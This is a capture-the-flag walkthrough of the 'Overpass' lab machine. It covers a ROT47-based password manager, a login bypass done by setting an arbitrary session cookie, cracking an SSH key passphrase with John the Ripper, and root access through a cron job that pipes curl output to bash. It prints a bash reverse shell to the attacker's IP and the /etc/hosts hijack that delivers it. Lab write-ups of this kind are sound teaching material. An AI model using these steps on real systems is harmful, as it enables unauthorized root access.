# Overpass

## Tasks
* user.txt
* root.txt

## Vulnerabilities
* Information disclosure in source code.
* Security misconfiguration
* Weak password policy
* And for the love of god ROT47 is not a secure algorithm.


# NMAP
```
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack Golang net/http server (Go-IPFS json-rpc or InfluxDB API)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

```

Checking out the web page, it doesn't have a robots.txt file
But there is something interesting in the source code of index.html
```html
<p>Overpass allows you to securely store different

passwords for every service, protected using military grade

<!--Yeah right, just because the Romans used it doesn't make it military grade, change this?-->

cryptography to keep you safe.

</p>
```
Romans? Perhaps it's referring to caesar ciphers.
Let's view the source code for the app. Since we're only interested in only how the encryption work, let's see what function it uses for it.
```go
func rot47(input string) string {
	var result []string
	for i := range input[:len(input)] {
		j := int(input[i])
		if (j >= 33) && (j <= 126) {
			result = append(result, string(rune(33+((j+14)%94))))
		} else {
			result = append(result, string(input[i]))
		}
	}
	return strings.Join(result, "")
```
Looks like it's using rot47.


Not much we can do, let's brute-force directories to find more.

# FFUF
I've started to use ffuf since it's much more faster than gobuster.
```txt
img                     [Status: 301, Size: 0, Words: 1, Lines: 1]
#                       [Status: 200, Size: 2431, Words: 582, Lines: 53]
downloads               [Status: 301, Size: 0, Words: 1, Lines: 1]
aboutus                 [Status: 301, Size: 0, Words: 1, Lines: 1]
admin                   [Status: 301, Size: 42, Words: 3, Lines: 3]
css                     [Status: 301, Size: 0, Words: 1, Lines: 1]
```
Looks like there's an admin page, let's check that out.
Before thinking of trying to brute force the login page, let's view the source code first.
No comments left out but we have a few interesting Javascript files.
```html
<script src="[/main.js](http://10.10.229.193/main.js)"></script>

<script src="[/login.js](http://10.10.229.193/login.js)"></script>

<script src="[/cookie.js](http://10.10.229.193/cookie.js)"></script>
```
I'm interested in login.js so let's check how it authenticates users.
```javascript
async function login() {
    const usernameBox = document.querySelector("#username");
    const passwordBox = document.querySelector("#password");
    const loginStatus = document.querySelector("#loginStatus");
    loginStatus.textContent = ""
    const creds = { username: usernameBox.value, password: passwordBox.value }
    const response = await postData("/api/login", creds)
    const statusOrCookie = await response.text()
    if (statusOrCookie === "Incorrect credentials") {
        loginStatus.textContent = "Incorrect Credentials"
        passwordBox.value=""
    } else {
        Cookies.set("SessionToken",statusOrCookie)
        window.location = "/admin"
    }
}
```
So it basically checks if the response of the page is equal to "Incorrect credentials", if it is, it doesn't log us in, otherwise it set's a cookie for us named 'SessionToken'.

What if we simply set our own token?
```txt
SessionToken: adasddads
```
And refresh the page and we're in!
And look what we got, 
```txt
-----BEGIN RSA PRIVATE KEY-----

Proc-Type: 4,ENCRYPTED

DEK-Info: AES-128-CBC,9F85D92F34F42626F13A7493AB48F337

LNu5wQBBz7pKZ3cc4TWlxIUuD/opJi1DVpPa06pwiHHhe8Zjw3/v+xnmtS3O+qiN

4FMg3ng0e4/7HRYJSaXLQOKeNwcf/LW5dipO7DmBjVLsC8eyJ8ujeutP/GcA5l6z

ylqilOgj4+yiS813kNTjCJOwKRsXg2jKbnRa8b7dSRz7aDZVLpJnEy9bhn6a7WtS

49TxToi53ZB14+ougkL4svJyYYIRuQjrUmierXAdmbYF9wimhmLfelrMcofOHRW2

+hL1kHlTtJZU8Zj2Y2Y3hd6yRNJcIgCDrmLbn9C5M0d7g0h2BlFaJIZOYDS6J6Yk

2cWk/Mln7+OhAApAvDBKVM7/LGR9/sVPceEos6HTfBXbmsiV+eoFzUtujtymv8U7

-----END RSA PRIVATE KEY-----
```
A private key for james out in the wilderness, not very smart, note that I shorten the private key for readability and avoiding cheaters.

Let's try using the key to ssh into the box.
Sadly it's not that easy, of course they set a password for the key, guess we have to use another tool

# John and ssh2john
If you have no idea, we can crack the password from the private key using ssh2john and johntheripper.
Let's first make something that is readable for john from the key.
```bash
$/opt/john/run/ssh2john.py id_rsa > id_rsa.john
```
Now just simply feed it into JTR and give it a wordlists and go make some tea.
```bash
$john id_rsa.john --wordlist=/opt/wordlists/rockyou.txt
```
And that was quick
Now let's login using the passphrase and key.
First flag should be in james's directory, there is another text there.
```txt
To Do:
> Update Overpass' Encryption, Muirland has been complaining that it's not strong enough
> Write down my password somewhere on a sticky note so that I don't forget it.
  Wait, we make a password manager. Why don't I just use that?
> Test Overpass for macOS, it builds fine but I'm not sure it actually works
> Ask Paradox how he got the automated build script working and where the builds go.
  They're not updating on the website
```
We'll keep this here first for reference.
Now what I usually do is check out sudo permission using sudo -l, but we don't have james's password.
I like to run a set of commands to find SETUIDs, using find
```bash
find / -perm -u=s -type f 2>/dev/null
```
But nothing much was found. So now I'll just run linpeas to get more information.
I'll also run pspy64 which is watches process.
Looking at linpeas output, I found this in the cronjobs.
```txt
* * * * * root curl overpass.thm/downloads/src/buildscript.sh | bash
```
This is not a usual thing that run in Linux, and It did mention of something script in the todo list.
Not only that, there is an interesting file that I shouldn't be able to write to.
```bash
/etc/hosts
```

The cronjob is also running every minute according to pspy64.
```bash
2021/07/27 12:53:01 CMD: UID=0    PID=22468  | /usr/sbin/CRON -f 
2021/07/27 12:53:01 CMD: UID=0    PID=22473  | bash 
2021/07/27 12:53:01 CMD: UID=0    PID=22478  | /usr/local/go/bin/go build -o /root/builds/overpassLinux /root/src/overpass.go 
2021/07/27 12:53:01 CMD: UID=0    PID=22482  | 
2021/07/27 12:53:01 CMD: UID=0    PID=22486  | /usr/local/go/bin/go build -o /root/builds/overpassLinux /root/src/overpass.go 
2021/07/27 12:53:01 CMD: UID=0    PID=22490  | date -R 
2021/07/27 12:54:01 CMD: UID=0    PID=22494  | bash 
2021/07/27 12:54:01 CMD: UID=0    PID=22493  | curl overpass.thm/downloads/src/buildscript.sh 
2021/07/27 12:54:01 CMD: UID=0    PID=22492  | /bin/sh -c curl overpass.thm/downloads/src/buildscript.sh | bash 
2021/07/27 12:54:01 CMD: UID=0    PID=22491  | /usr/sbin/CRON -f 
2021/07/27 12:54:01 CMD: UID=0    PID=22496  | bash 
2021/07/27 12:54:02 CMD: UID=0    PID=22501  | /usr/local/go/pkg/tool/linux_amd64/compile -V=full 
2021/07/27 12:54:02 CMD: UID=0    PID=22505  | 
2021/07/27 12:54:02 CMD: UID=0    PID=22509  | /usr/local/go/bin/go build -o /root/builds/overpassLinux /root/src/overpass.go 
2021/07/27 12:54:02 CMD: UID=0    PID=22513  | date -R 
```
Now let's plan this, so we know that it will curl to this directory.
```txt
/downloads/src/buildscript.sh
```
And the host needs to be overpass.thm, we can probably do that by changing the entry in hosts to point to our attack machine, let's create a malicious buildscript.sh first.
```bash
bash -i >& /dev/tcp/10.17.1.163/4444 0>&1
```
I'll do a simple reverse shell, since it's being ran as root, when we receive the shell, it'll maintain that privilege.
Okay so now we just need to host a page on port 80, so it can fetch the script.
```bash
sudo python3 -m http.server 80
```
Now let's setup a listener and wait for a GET request.
```txt
10.10.229.193 - - [27/Jul/2021 21:19:31] "GET /downloads/src/buildscript.sh HTTP/1.1" 200
```
And we got a shell back.
Now grab that root.txt





